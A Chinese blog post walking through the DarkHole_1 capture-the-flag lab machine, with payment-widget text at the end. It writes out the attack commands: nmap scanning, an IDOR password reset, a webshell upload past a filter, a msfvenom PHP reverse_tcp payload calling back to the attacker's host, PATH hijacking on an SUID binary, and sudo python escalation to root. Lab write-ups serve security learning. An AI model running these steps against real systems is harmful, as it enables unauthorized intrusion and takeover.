每周打靶-DarkHole系列靶机实战

DarkHole_1

信息搜集

使用nmap进行存活IP检测
nmap -sP 192.168.23.0/24
image.png
发现目标靶机ip,扫描开放端口及其服务
nmap -sV 192.168.23.167
image.png
发现开放80(http)、22(ssh)端口,进行目录遍历、指纹搜集
dirsearch.py -u [http://192.168.23.167](http://192.168.23.167)
image.png
whatweb -v 192.168.23.167
image.png
暂时没有发现很醒目的特征,使用浏览器进行登陆。
image.png

开始渗透

发现页面上只有一个登陆页面可以进入
image.png
抓包后发现,暴力破解用户名密码不太现实
image.png
发现可以注册用户,注册一个新用户,并使用这个用户进行登陆,可以看到用户名,密码邮箱并没有进行正则过滤。
image.png
image.png
看到这里可以更改用户密码,更改密码并抓包
image.png
看到有参数 id=2,怀疑有越权漏洞,开始尝试,id=2是我刚开始创建的普通用户,那么id=1就有可能是高权限用户,修改参数并尝试登陆,
image.png
123456,就是为id=1的用户修改的新密码,然后退出本页面,再重新使用密码123456登陆,这时我们已经确定了密码是正确的,可以使用BP的intruder模块进行暴力破解,也可以尝试常用管理员用户名进行尝试登陆
image.png
我使用用户名 admin密码123456登陆,成功登陆管理员页面,发现可以上传文件
上传简单木马
image.png
发现做了黑名单过滤,
image.png
抓包进行文件后缀名修改,发包
image.png
上传成功,并回显上传路径,使用蚁剑进行链接,获取到shell
image.png

3.反弹shell

使用kali生成反弹shell
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.23.150 lpor=4444 -o msfshell.php
image.png
打开kali的ftp服务,操作靶机shell进行下载
image.png
使用美少妇(msf)监听模块,并设置参数,和攻击载荷
image.png
运行,并访问刚才靶机下载到upload文件夹下的反弹shell
image.png
kali获取到,输入 shell,并输入python3 -c 'import pty;pty.spawn("/bin/bash")'获取交互式shell
image.png

4.提权

可以看到目前权限太低,先查看cat /etc/passwd | grep /bin/bash,敏感文件,发现可以尝试提权到的用户
image.png
到 home目录下查找john文件夹,发现toto文件有suid权限,执行发现是命令 id 的功能
image.png
我们可以利用这个功能,我们可以编写一个新的id命令,给执行权限,然后导入环境变量,让其执行id命令功能时可以引用我们的代码,从而获取到john的shell
image.png
运行 toto文件,提权到 john 权限
image.png
获取john 的用户密码
image.png
查看这个用户下有没有可以执行的特权命令
sudo -l
image.png
发现对 file.py 文件有读写权限,然后写入shell,然后再去执行脚本,就成功获取root权限
echo 'import os;os.system("/bin/bash")' > file.py
sudo python3 /home/john/file.py
image.png
然后到 root 目录下查看文件,发现root.txt, cat一下
image.png

flag到手,渗透结束(good game)!!!

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值